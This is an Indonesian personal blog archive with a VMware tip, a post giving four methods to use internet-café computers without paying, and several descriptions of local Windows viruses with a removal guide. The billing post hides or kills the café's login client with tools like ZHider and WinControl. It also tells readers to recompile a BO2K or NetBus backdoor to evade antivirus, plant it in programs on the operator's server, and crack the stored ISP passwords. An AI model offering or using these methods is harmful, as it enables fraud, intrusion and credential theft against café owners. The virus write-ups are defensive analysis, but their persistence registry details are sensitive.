Rinaldo Jonathan

Windows 7 Aero di Virtual Machine...

2010-05-31T23:51:00.000-07:00

yaa... sekali lagi hal yang aneh... gruuu
sekarang sudah ada virtual machine yang mensupport Windows Aero...
itu dia VMWare...
tapi download yang terbaru ya, biar bisa...
pertama habis udah di install, nilai aja dulu komputer nya... maksud gw System Performance...
Bingung? cari di games, ada satu.
Kalau nilainya masih 1.0, instal dulu vmware tools nya...
dijamin nanti paling enggak 2.0...
cuma itu... kadang masih crash, jadi jangan nyimpan yg penting2 di situ, ok??
selamat mencoba! gw mau lanjutin pendalaman materi yg membosankan ini :-(

Ngebobol Billing Warnet..

2010-02-22T21:16:00.000-08:00

Membobol Semua Jenis Billing Warnet

Pertidaktanggungjawaban : Artikel ini ditulis untuk menambah pengetahuan tentang keamanan sistem komputer terutama para operator / SysAdmin dari server warnet, penulis tidak bertanggung jawab bila artikel ini digunakan untuk kejahatan apapun bentuknya.tulisan ini dibuat bukan untuk mecuri rejeki orang,tetapi hanya untuk memperluas wawasan para netter indonesia

Cara pertama

Cara ini saya dapetin pas kantong lagi kempes tapi nafsu online lagi tinggi
Setelah muter2 otak sebentar sambil tidur, akhirnya kutemukan cara buat ngakalin billing warnetnya buat ngirit ongkos online.
Kalau cara yang ada di X-Code Magz vol4 itu cuma bisa untuk Billing Explorer(memang bisa, saya sudah membuktikannya)
Cara ini berlaku untuk segala versi billing explorer dan kebanyakan aplikasi billing lainnya. Dan merupakan kelemahan semua billing warnet yang berbasis windows!!!

Penasaran mau tau caranya ? Baca aja sampai habis !
Skali lagi saya ingatkan buat anda yang merasa udah pinter diharapa ga usah baca, kecuali pengen mati kebosanan (niru kata-kata siapa ya?

Ini dia caranya …
Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu.
Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah… udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan

Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu.

Yang harus disiapkan:
1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket. Aku nemunya pas sd tapi baru sekarang kepake ^^
2. Muka bego
3. Mental yang kuat

Langkah-langkahnya:

01. Masuk warnet dan pasang muka bego biar ga dicurigai operator
02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih.
03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak.
04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati.
05. Saat masuk login screen, login aja seperti biasa.
06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google.
07. Setelah ZHider dijalankan langsung aja logout.
08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!!
09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login.
10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana
11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai.
12. Logout. SIapkan muka bego, lalu bayar tarif.

Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran.

Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider

CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.

Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhai Tuhan
Kalo ketahuan langsung pertebal “muka bego”-mu. Misalnya bilang “Eh, kok jadi gini ya? Kemaren ga gini kok.” Ato kata-kata lain, tergantung kreatifitas anda.

NB : Program ini tidak dapat digunakan untuk warnet2 yang menggunakan GEtBack..

Cara kedua

1.pasang muka culun (ato bego) kek yg diomongkan diatas
2.sediah kopi
3.tentunya rokok
4.nah sekarang yg perlu kalian jalankan adalah
5.cabut kabel lan cardnya …
6.trus restart komputer kamu
7.jika sudah kluar gambar desktop sebelum gambar billing itu kluar kamu cepet²an tekan alt+del+ctrl dan kamu del yg client 008
gampangkan ?

Cara ketiga

Sering kali kita menjadi lupa waktu bila berada didepan komputeruntuk surfing dan hal ini ngak jadi masalah bila memakai komputer di kantor dengan koneksi broadband atau Dsl. Masalah baru muncul apabila kita surfing di Warnet. Proteksi yang biasa digunakan oleh warnet pada umumnya adalah nag screen atau window yang mengharuskan kita login terlebih dahulu [note:login ini berbeda dengan login start up] karena pada dasarnya komputer sudah dalam keadaan siap pakai hanya terhalang oleh nag screen tersebut, sedangkan koneksi ke internet dalam keadaan stand by. Yang harus dilakukan adalah membypass proteksi tersebut.

Prosedurnya adalah :
Tetap harus login terlebih dahulu agar tidak mencurigakan

Download Wincontrol –>> winctrl.exe untuk bypass login screen

Ekstrak wincontrol dan aktifkan
F9 = untuk menghilangkan window pada aktif cursor
F10= untuk mengembalikan window seperti semula
Jalankan timer untuk mengingatkan durasi waktu yang diinginkan
Logout bila telah mencapai biaya yang ditetapkan, biasanya tarif perjam Rp 6.000,-
Setelah logout tekan F9 maka login screen akan menghilang dan kita bisa kembali surfing tanpa biaya. Jangan lupa untuk menonaktifkan wincontrol setelah selesai.

Usahakan agar tidak terlalu menarik perhatian penjaga warnet [ surfing selama 3 jam = Rp 1500 ? ] cari warnet yang mempunyai banyak workstations-nya.

Untuk Mendownload Wincontrol dapat di download di www.yogyafree.net

Cara keempat

Alat yang dibutuhkan : - Backdoor Program , i.e: bo2k, netbus
- Portscanner
- Nekat !

Praktek : - Jelajahi warnet yg ada di kotamu, perhatikan apakah di server komputer ada drive utama yang di-mount.(Setidaknya server harus ber-os MicroShit Windows 98/NT).

- Siapkan program backdoor kamu yang sudah kkamu konfigurasi bo,netbus.. terserah kamu ;p >, agar tidak dikenali disarankan program backdoornya di recompile ulang agar tdk dikenali oleh antivirus, tambahkan data sampah sesuka kamu, jika tidak kamu recompile juga tdk apa-apa tetapi program akan mudah dikenali oleh antivirus.

- Cari program .exe yang biasanya sering dippakai oleh operator warnet,i.e: Mirc32.exe, iexplore.exe dll.

- Copy file tersebut di komputer client warnnet, sisipkan backdoor kamu ke program tersebut pake silkrope (Baca petunjuknya di press release bo2k, (http://www.bo2k.com )

- Delete file original di komputer server (HHati - hati jika tdk bisa kemungkinan
program sedang dipakai, pake program lain spt iexplore.exe ).

- Setelah mendelete file asli di komputer seerver, copykan file yang sudah disisipi backdoor dari komputer client warnet ke komputer server, tentunya dengan memakai nama asli program seperti Mirc32.exe atau iexplore.exe.

- Logout dari client warnet dan bayar sewa iinternet. (Pasang muka lugu dan bego).

- Setelah sehari dirasa cukup maka kembali llagi ke warnet yang di-hack dan lakukan scanning port yang terbuka, jika port yang terbuka match dengan konfogurasi backdoor kamu maka ….. SELAMAT BUNG !! Anda layak tertawa….. hi….hi…hi….., backdoor anda telah dijalankan oleh operator warnet yang !! kekekeke.

- Lakukan penjelajahan sepuas kamu….., lisst password jika server warnet NT dan krack pakelophtkrack, jika server windows 9x…..tertawalah lagi sampai akan muntah dan kejang - kejang.. ;p ,karena jika di list passwordnya akan didapati password dial-up ke ISP. tanpa “ENCRYPT” sama sekali..

- Having fun….. and stay out of troble ..ddan ingat “Junjunglah Etika HACKER”, jangan sekali -kali membuat kerusakan, cukup untuk kamu lihat - lihat server warnet…OK

Virus BigBang

2010-02-17T20:59:00.000-08:00

BigBang. Virus ini dibuat dengan bahasa pemrograman Visual Basic, berukuran sekitar 20 KB dalam keadan ter-pack. Beberapa file virus akan diciptakan pada root drive dengan nama file Sandra Dewi.exe, Luna Maya.exe, DSC_0506.exe, DSC_1505.exe dan sebagainya. String BigBang terlihat saat klik kanan file virus, pilih Properties - Version - Internal Name. Beberapa aplikasi akan dialihkan oleh virus, antara lain:

- Saat mengakses command prompt (Start - Run - cmd), aplikasi yang dipanggil adalah OSK (On Screen Keyboard).
- Saat mengakses MS Config (Start - Run - msconfig), aplikasi yang dipanggil adalah game MSheart.
- Saat mengakses Task Manager (Start - Run - taskmgr), aplikasi yang dipanggil adalah Magnify.

Pada saat login, akan ditampilkan pesan:

PESAN DARI SURGA
PERSAHABATAN TAK AKAN PERNAH ABADI

Virus Indaboxa

2010-01-27T01:11:00.000-08:00

Indaboxa. Virus ini dibuat menggunakan Visual Basic dengan ukuran sekitar 40KB.File-file yang diciptakannya pada root drive antara lain bernama “Bocoran UAN dan UAS.exe”, “Counter Strike.exe”, dan nama file lain yang bisa jadi mengundang pengguna untuk menjalankannya jika tidak waspada. Jika menilik properties file-nya, pada bagian Version Comment dan Company akan tertera: INDABOXA.

Salah satu ciri virus ini adalah mengubah nilai registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText dengan pesan: “KESALAHAN BUKAN PADA KOMPUTER ANDA MELAINKAN PADA DIRI ANDA”. Pesan tersebut akan tampil ketika pengguna menekan CTRL + ALT + DEL untuk masuk ke dalam Windows Log On, atau saat melakukan Log Off dan ingin login dengan user account lain.

Virus EvolutionMp3

2010-01-26T19:33:00.000-08:00

EvolutionMp3. Virus ini dibuat dengan bahasa pemrograman Visual Basic, dengan ukuran sekitar 44 KB. File berekstensi *.mp3 yang ia temukan akan dihapus dan digantikan dengan file virus. Konfigurasi klik pada mouse akan tertukar antara klik kanan dan klik kiri. Contohnya jika Anda biasa menjalankan sebuah aplikasi dengan klik ganda tombol mouse sebelah kiri, maka saat virus ini aktif, Anda baru bisa menjalankan aplikasi dengan klik ganda tombol mouse sebelah kanan. Setiap akan masuk Windows, virus menampilkan pesan sebagai berikut:

STOP PIRACY!!!!

Stop pembajakan Musisi Dalam Negeri, Jangan Gunakan MP3 lagi (sok sok an) huahahahahaha!!!

Virus Gambar

2010-01-25T18:02:00.000-08:00

Gambar. Salah satu hal yang meresahkan pengguna komputer yang terkena virus adalah saat file-file datanya dimanipulasi virus, entah dihapus, di-hidden, atau di-encrypt. Demikian pula yang dilakukan virus ini, berukuran sekitar 84 KB, virus ini dibuat dengan bahasa pemrograman Delphi. Untungnya, virus ini hanya mengubah atribut file-file dengan ekstensi *.doc, *.xls, *.jpg, *.mp3, dan *.3gp menjadi super hidden. Lalu virus akan menduplikasikan diri meniru namafile file-file yang telah diubah atributnya tadi. Virus ini juga mengcopykan dirinya dengan nama gambar.exe ke beberapa folder yang telah ditentukan. Seperti umumnya virus lain, virus ini memiliki pesan tertentu sebagai tanda eksistensinya. Virus membuat file BACA_DULU_DONG!!!!!!!!!.BAT, yang berisi pesan berikut:

MAAF YA MAU PINJAM KOMPUTERNYA UNTUK ISTIRAHAT SEBENTAR AJA, BOLEHKAN ?????
JANGAN KHAWATIR KOMPUTER NYA NGAK DIAPA - APAIN DECH
SOAL NYA AQ BARU DATANG DARI TEMPAT YANG JAUH…… MAKLUMLAH MUSAFIR
Oh.. Ya… JADI LUPA NICH KENALKAN NAMAKU ” G3X.B ”
SALAM KENAL BUAT SIAPA SAJA YANG SEDANG AKTIF DI KOMPUTER INI
ADUH JADI NGEREPOTIN NICH, AQ MAU ISTRAHAT DULU YA, DA..AA.AAA
GOOD LUCK FOR YOU !

Virus Mshearts

2010-01-25T17:59:00.001-08:00

Mshearts. Dibuat dengan VB Script dan berukuran sekitar 32 KB, virus ini menyerang root drive termasuk removable disk hingga mencapai drive letter O, dengan mengcopykan file dengan nama mshearts.vbs dan autorun.inf. Keberadaan virus ini relatif mudah diketahui karena virus akan meletakkan file dengan nama I’M here.htm pada desktop. Pesan pada file HTML tersebut berisi:

.vbs LOLA 666.

– Pesan Negara –

Coba lihatlah keadaan pedidikan di negeri kami..

Apakah pemerintah sudah memberikan yang terbaik..

Masih ada yang jauh di sana..

Yang tidak menerima pendidikan..

Pemerintah tidak bertanggung jawab..

Memajukan pendidikan umum..

Ini merupakan janji kalian untuk kami..
(¯`•.¸¸.»[I’M Back]«.¸¸.•´¯)
-= Sorong papua 17-06-08 =-

Virus Zhola

2010-01-25T17:54:00.000-08:00

Zhola. Dibuat dengan bahasa pemrograman Visual Basic tanpa di-pack, berukuran sekitar 672 KB, virus Zhola termasuk virus yang memiliki payload ganas. Icon yang dimilikinya menyerupai icon software lokal. Ia akan mencari berbagai file dokumen dan multimedia, untuk kemudian menghapusnya dan menggantikan dengan file virus yang menyamar dengan nama file tersebut. Di dalam tubuhnya, virus menyimpan ekstensi file berikut: *.doc,*.jpg,*.mp3,*.avi,*.mpeg,*.3gp,*.flv,*.mpg,*.mov,*.wmv,*.wav,*.3gp2. Setiap file dengan ekstensi tersebut akan menjadi incaran virus. Selain itu pada setiap root drive yang ditemuinya, virus juga menciptakan file dengan nama windows.exe, Love Letter 4 Zhola.exe, dan autorun.inf seperti tampak pada screenshot.

Virus SlowButSure.vbs.G

2010-01-25T17:53:00.000-08:00

SlowButSure.vbs.G. Dibuat dengan VBScript dan berukuran sekitar 8 KB, pada tubuhnya tertulis
“My name is Slow but sure V1.08“. Jangan terkecoh jika virus ini justru memperbaiki registry, seperti menampilkan Task Manager jika keadaannya disabled, mengembalikan menu Folder Options pada Windows Explorer jika keadaannya ter-hidden, dan perbaikan registry-registry lain yang umum diubah virus.Tapi apa gunanya jika ia sendiri menyebar dan membuat tampilan-tampilan yang mengganggu? Salah satunya adalah mengubah system property My Computer seperti pada gambar, tertulis:

Registered To:

amaze
I’m Not Panic, Virus anda sudah kami lumpuhkan !

Kalau McGyver membuat virus

2010-01-25T17:46:00.000-08:00

Masih ingat film McGyver yang dibintangi oleh Richard Dean Sanderson ? Di tangan McGyver, barang apapun yang ada di dekatnya bisa dijadikan sebagai alat atau senjata yang ampuh. Dengan bantuan Victorinox dan kreativitasnya, ia bisa meracik bahan-bahan yang biasa ada di rumah menjadi senjata mematikan seperti pelontar api sampai merakit bom. Rupanya hal yang sama terjadi pada dunia maya dimana hanya dengan bahasa pemrograman yang dipandang sebelah mata (VB Script) oleh para programmer diciptakan satu virus yang secara de Facto hari ini menjadi virus yang paling ganas dan paling banyak mengganggu di awal tahun 2010. Siapakah dia ? Tidak lain dan tidak bukan adalah Messenger yang di deteksi secara generik dengan nama W32/VBTroj.CEPA. Virus ini mampu melakukan banyak sekali hal seperti menginstal rootkit, memblok akses jaringan dan memanipulasi file hosts Windows supaya bisa melakukan pemblokiran akses ke situs-situs sekuriti pada komputer korbannya. Dan canggihnya lagi, file hosts tersebut di enkrip untuk menghindari deteksi dan perbaikan oleh program antivirus.

Baru-baru ini telah muncul satu virus lain ikut merampaikan acara tutup tahun ini, walaupun virus ini dibuat dengan program bahasa Visual Basic tetapi efek yang dihasilkan cukup merepotkan, ia akan melakukan blok terhadap ”hampir” semua tools security termasuk antivirus yang umum sering digunakan oleh user dengan cara membaca ”nama file” dari aplikasi tersebut.

Virus ini juga akan melakukan blok akses ke beberapa situs sekuriti atau situs lain yang telah ditentukan dengan cara mengalihkan ke nomor ip 209.85.225.99 yang merupakan ip publik www.google.com (lihat gambar 1), hal ini secara tidak langsung sebenarnya menyebabkan Ddos terhadap situs Google.com. Apakah ada hubungan atau tidak dengan serangan terhadap Google di China yang mengakibatkan Google mempertimbangkan untuk hengkang .... kita lihat saja. Yang jelas, makin banyak komputer yang terinfeksi oleh virus ini, maka akses (yang secara tidak langsung menyebabkan Ddos) terhadap situs awal Google akan makin tinggi.

Sehingga setiap kali user mencoba untuk akses ke website tertentu termasuk website security / antivirus, maka yang muncul adalah situs www.google.com. Untuk melakukan hal ini ia akan menambahkan alamat website yang akan di blok ke sebuah file HOSTS yang berada di direktori [C:\Windows\System32\Drivers\etc]

Virus ini menyebar sangat cepat dengan memanfaatkan media chatting yang umum digunakan oleh user seperti Yahoo Messenger, MSN Messenger dan Skype dengan cara mengirimkan sebuah pesan dan melampirkan link untuk download sebuah file yang direkayasa seolah-olah file gambar (JPG) tetapi sebenarnya merupakan file virus yang sudah dikompres dengan nama file [%file%.JPG.ZIP] dengan ukuran yang berdeda-beda tegantung pada varian yang menginfeksi komputer tersebut, file yang dikompres tersebut mempunyai ekstensi EXE. Jika menerima pesan tersebut sebaiknya jangan anda terima apalagi menjalankan file yang disertakan walaupun dari kontak Messenger teman yang anda kenal, memang bukan teman anda yang mengirimkan virus tetapi virus yang menginfeksi komputernya dan memanfaatkan rekening Messengernya.

Salah satu hal yang menyebabkan virus ini sukses menyebar selain menggunakan media yang disebutkan di atas, ia juga akan melakukan update untuk memperbaharui dirinya hal inilah yang menyebabkan scaner antivirus tidak dapat mendeteksi virus tersebut. Virus ini semakin kuat bercokol dengan bantuan sebuah file rootkit yang bertugas untuk melindungi file induk yang aktif di memori, sehingga pembersihan yang dilakukan melalui windows Normal, Safe Mode atau safe Mode With Command Prompt terkadang tidak dapat menyelesaikan masalah, bagaimana mengatasi hal ini ? Silahkan simak pada bagian terakhir artikel ini.

Seperti yang sudah di jelaskan di atas bahwa virus ini dibuat dengan menggunakan bahasa Visual Basic, untuk file induk virus ini mempunyai ukuran yang bervariasi tergantung dari varian yang menginfeksi komputer target, biasanya akan mempunyai ukuran di atas 200 KB, sedangkan file pendukung lainnya mempunyai ukuran yang berbeda-beda yang akan di simpan didirektori yang berbeda-beda.

Virus ini akan menggunakan icon Project Visual Basic dan untuk beberapa kasus akan menggunakan icon MSN Messanger untuk mengelabui user.

Bagaimana mengenali virus ini?

§ Akan menampilkan website www.google.com pada saat user mengakses web security / web antivirus, untuk beberapa varian tidak akan menampilkan website di atas.

§ Disable CMD dengan cara menutup aplikasi ini secara otomatis saat dijalankan.

§ Untuk beberapa varian, komputer yang terinfeksi akan dapat mengakses komputer lain dalam jaringan. Tetapi sebaliknya, komputer tersebut tidak akan dapat diakses oleh komputer lain dalam jaringan. Salah satu kemungkinan aksi ini dilakukan adalah untuk mempersulit pembersihan dan sekaligus mencegah infeksi ulang pada komptuer yang sudah terinfeksi.

§ Terdapat perubahan pada file [C:\Windows\system32\drivers\etc\hosts], dengan menambahkan daftar alamat website yang akan di blok dengan format penulisan ip 209.85.225.99 yang di ikuti alamat website, untuk beberapa kasus virus ini akan mengenkripsi file hosts tersebut sehingga user tidak dapat mengetahui isi script yang di ubah, dengan bantuan tools maka anda dapat melihat dengan jelas isi dari file hosts tersebut.

File induk Virus

Pada saat virus ini di aktifkan, ia akan membuat beberapa file induk yang akan di simpan dibeberapa lokasi yang berbeda-beda yang akan di aktifkan setiap kali komputer dinyalakan. Selain itu virus ini juga akan menyamarkan dirinya sebagai sebuah service Windows dan sebuah drivers yang berfungsi sebagai rootkit yang salah satu tugasnya akan melindungi proses virus yang aktif dimemori sehingga mempersulit dalam proses pembersihan dengan nama file yang berbeda-beda.

Berikut beberapa file yang akan dibuat oleh virus:

* C:\windows\System32

ü Wmi%xxx.exe, dimana xxx menunjukan karater acak (contohnya: wmispqd.exe, wmisrwt.exe, wmistpl.exe, atu wmisfpj.exe) dengan ukuran file yang berbeda-beda tergantung varian yang menginfeksi computer target.

ü %xxx%.exe@, dimana %xxx% menunjukan karakter acak (contoh: qxzv85.exe@) dengan ukuran yang berbeda-beda tergantung varian yang menginfeksi.

ü secupdat.dat

* C:\Documents and Settings\%user%\%xx%.exe, dimana xx adalah karakter acak (contoh: rllx.exe) dengan ukuran file sekitar 6 kb atau 16 kb (tergantung varian yang menginfeksi). File ini akan disembunyikan oleh virus guna mempersulit dalam penghapusan.
* C:\Windows\System32\drivers

ü Kernelx86.sys

ü %xx%.sys, dimana xx ini adalah karakter acak yang mempunyai ukuran sekitar 40 KB (contoh: mojbtjlt.sys atau cvxqvksf.sys)

ü Ndisvvan.sys

ü krndrv32.sys

* C:\Documents and Settings\%user%\secupdat.dat
* C:\Windows\INF

ü netsf.inf

ü netsf_m.inf

Autorun

Agar file tersebut dapat di jalankan secara otomatis, ia akan membuat string pada registri dengan memanipulasi file windows dengan nama ctfmon.exe, Sebenarnya trik ini digunakan agar user tidak curiga, tapi jika dilusuri lebih jauh ini adalah langkah yang brilian karena file ini justru mempunyai peranan yang sangat penting agar dirinya dapat aktif secara otomatis dengan menjalankan file virus yang sudah ditentukan. Selain itu ia juga akan aktif setiap kali user menjalankan file “explorer.exe” atau membuka aplikasi “Windows Explorer”

Ø HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run

· ctfmon.exe

Ø HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe

· Debugger = %file_induk_virus%.exe (contoh : wmistpl.exe)

Ø HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon

· shell = explorer.exe "C:\Documents and Settings\%user%\%xx%.exe”

Catatan: %xx%, adalah karakter acak, contoh: rllx.exe

Ø HKEY_LOCAL_MACHINE\system\ControlSet001\services

· %xx% menunjukan file acak

o Image path = System32\drivers\%xx%.sys (contoh: jdwjlyju.sys)

Ø HKEY_LOCAL_MACHINE\system\CurrentControlSet\services

· %xx% menunjukan file acak

o Image path = System32\drivers\%xx%.sys (contoh: jdwjlyju.sys)

Blok fungsi Windows

Untuk memperlancar aksi nya ia akan blok beberapa fungsi windows termasuk disable System Restore, disable Windows Firewall, disable RPC DCOM, disable upgrade Service Pack 2 dan tidak bisa menampilkan file yang tersembunyi dengan merubah string pada registry berikut:

Ø HKEY_LOCAL_MACHINE\software\microsoft\ole

· EnableDCOM = N

Ø HKEY_LOCAL_MACHINE\software\microsoft\security center

· AntiVirusDisableNotify = 1

· FirewallDisableNotify = 1

· AntiVirusOverride = 1

· FirewallOverride = 1

Ø HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore

· DisableConfig = 1

Ø HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate

· DoNotAllowXPSP2 = 1

Ø HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden

· DefaultValue = 0

· CheckedValue = 1

Ø HKEY_LOCAL_MACHINE\system\ControlSet001\control\lsa

· restrictanonymous = 1

Ø HKEY_LOCAL_MACHINE\system\CurrentControlSet\control\lsa

· restrictanonymous = 1

Ia juga akan merubah registry berikut:

Ø HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

· userinit = C:\WINDOWS\system32\Userinit.exe, ,C:\Documents and Settings\%user%\%files_virus%.exe \s (%file_virus, menunjukan nama file yang berbeda-beda tergantung varian yang menginfeksi, ontohnya: fnhh.exe).

Agar file virus tersebut dapat aktif secara bebas di computer target, ia juga akan mendaftarkan file induk virus tersebut dan rule windows firewall berikut :

Ø HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List

· C:\windows\system32\%file_induk_virus%.exe (contoh: wmistpl.exe) = C:\windows\system32\%file_induk_virus%.exe (contoh: wmistpl.exe) :*:Enabled:UPnP Firewall

Ø HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

· C:\windows\system32\ file_induk_virus%.exe (contoh: wmistpl.exe) = C:\windows\system32\%file_induk_virus%.exe (contoh: wmistpl.exe) :*:Enabled:UPnP Firewall

Selain dengan membuat string registry tersebut, ia juga akan blok “hampir” semua tools sekuriti yang umum digunakan dengan cara membaca nama file dari aplikasi tersebut.

Blok akses Internet

Sebagai oleh-oleh ia akan mencoba untuk blok akses ke website security termasuk antivirus, dengan cara menampilkan website www.google.com (untuk beberapa varian tertentu untuk blok akses web sekuriti tidak akan menampilkan web www.google.com).

Untuk melakukan hal ini ia akan merubah isi file Hosts Windows yang berada di direktori [C:\Windows\System32\Drivers\Etc\Hosts] dengan cara menambahkan nomor ip publik www.google.com di ikuti dengan alamat website yang akan diblok dan untuk beberapa kasus virus ini akan mengenkripsi file tersebut sehingga user tidak dapat mengetahui isi dari tersebut.

Update layaknya antivirus

Virus ini dapat melakukan update layaknya program antivirus dengan mendownload beberapa file dari website yang telah ditentukan, file ini biasanya akan di simpan didirektori [C:\Windows\System32] dengan format file %xxx%.exe@, dimana %xxx% merupakan nama file dan ukuran yang berbeda-beda (contoh: qxzv85.exe@)

Blok akses “Safe Mode” dan ”Safe Mode with command prompt”

Untuk beberapa kasus virus ini juga akan berupaya untuk menghapus key “safeboot” sehingga komputer tidak dapat booting ke mode “safe mode” dan “safe mode with command prompt”. Untuk melakukan hal ini ia akan menghapus string berikut:

Ø HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot

Ø HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SafeBoot

Ø HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot

Media Penyebaran

Untuk menyebarkan dirinya ia akan memanfaatkan media chatting yang umum digunakan oleh user seperti Yahoo Messenger, Gtalk, Skype dan MSN Messenger dengan mengirimkan sebuah pesan kesemua alamat ID yang ada di komputer target dengan menyertakan link untuk mendownload sebuahlampiran yang sudah dikompresi dengan ukuran yang bervariasi sesuai dengan varian yang menginfeksi, file tersebut mempunyai nama file [%file%.JPG.ZIP], file yang dikompres tersebut mempunyai ekstensi EXE. Jika menerima pesan tersebut sebaiknya jangan anda terima apalagi menjalankan file yang disertakan kecuali anda mau terinfeksi virus ini.

Pesan yang akan disampaikan mempunyai isi yang berbeda-beda, sedangkan untuk link yang di sertakan salah satunya mengarah kesebuah alamat 208.77.45.10.

1. Putuskan komputer yang akan di bersihkan dari jaringan maupun internet

2. Ubah nama file [C:\Windws\system32\msvbvm60.dll] menjadi [xmsvbvm60.dll] untuk mencegah virus aktif kembali selama proses pembersihan.

3. Sebaiknya lakukan pembersihan dengan menggunakan Tools Windows Mini PE Live CD hal ini disebabkan untuk beberapa file induk dan file rootkit yang menyamar sebagai services dan drivers sulit untuk di hapus terlebih file ini akan disembunyikan oleh virus.

Kemudian booting komputer dengan menggunakan software Mini PE Live CD tersebut. Setelah itu hapus beberapa file iduk virus dengan cara : (lihat gambar 11)

· Klik menu [Mini PE2XT]

· Klik menu [Programs]

· Klik menu [File Management]

· Klik menu [Windows Explorer]

· Kemudian hapus file berikut:

ü C:\Windows\System32

§ Wmi%xxx.exe, dimana xxx menunjukan karater acak (contohnya: wmispqd.exe, wmisrwt.exe, wmistpl.exe, atu wmisfpj.exe) dengan ukuran file yang berbeda-beda tergantung varian yang menginfeksi computer target.

§ %xxx%.exe@, dimana %xxx% menunjukan karakter acak (contoh: qxzv85.exe@) dengan ukuran yang berbeda-beda tergantung varian yang menginfeksi.

§ secupdat.dat

ü C:\Documents and Settings\%user%\%xx%.exe, dimana xx adalah karakter acak (contoh: rllx.exe) dengan ukuran file sekitar 6 kb atau 16 kb (tergantung varian yang menginfeksi).

ü C:\Windows\System32\drivers

§ Kernelx86.sys

§ %xx%.sys, dimana xx ini adalah karakter acak yang mempunyai ukuran sekitar 40 KB (contoh: mojbtjlt.sys atau cvxqvksf.sys)

§ Ndisvvan.sys

§ krndrv32.sys

ü C:\Documents and Settings\%user%\secupdat.dat

ü C:\Windows\INF

§ netsf.inf

§ netsf_m.inf

Gambar 11, Gunakan Windows Mini PE untuk menghapus file virus

4. Hapus registry yang dubah dibuat oleh virus, dengan menggunakan "Avas! Registry Editor", caranya : (lihat gambar 12)

· Klik menu [Mini PE2XT]

· Klik menu [Programs]

· Klik menu [Registry Tools]

· Klik [Avast! Registry Editor]

· Jika muncul layar konfirmasi kelik tombol "Load....."

· Kemudain hapus registry:

ü LOCAL_MACHINE_SOFTWARE\microsoft\windows\currentverson\run\\ctfmon.exe

ü LOCAL_MACHINE_SYSTEM\ControlSet001\services\\kernelx86

ü LOCAL_MACHINE_SYSTEM\CurrentControlSet\services\\kernelx86

ü LOCAL_MACHINE_SYSTEM\CurrentControlSet\services\\passthru

ü LOCAL_MACHINE_SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\\ctfmon.exe

ü LOCAL_MACHINE_SOFTWARE\microsoft\windows nt\currentversion\winlogon

§ Ubah value pada string Userinit menjadi = userinit.exe,

ü LOCAL_MACHINE_SOFTWARE\microsoft\windows nt\currentversion\winlogon

§ Ubah value pada string Shell menjadi = Explorer.exe

ü LOCAL_MACHINE_SYSTEM\ControlSet001\services\\%xx%

ü LOCAL_MACHINE_SYSTEM\CurrentControlSet\services\\%xx%

ü LOCAL_MACHINE_SYSTEM\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\\C:\windows\system32\%file_induk_virus%.exe (contoh: wmistpl.exe)

ü LOCAL_MACHINE_SYSTEM\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\\C:\windows\system32\%file_induk_virus%.exe (contoh: wmistpl.exe)

Catatan:
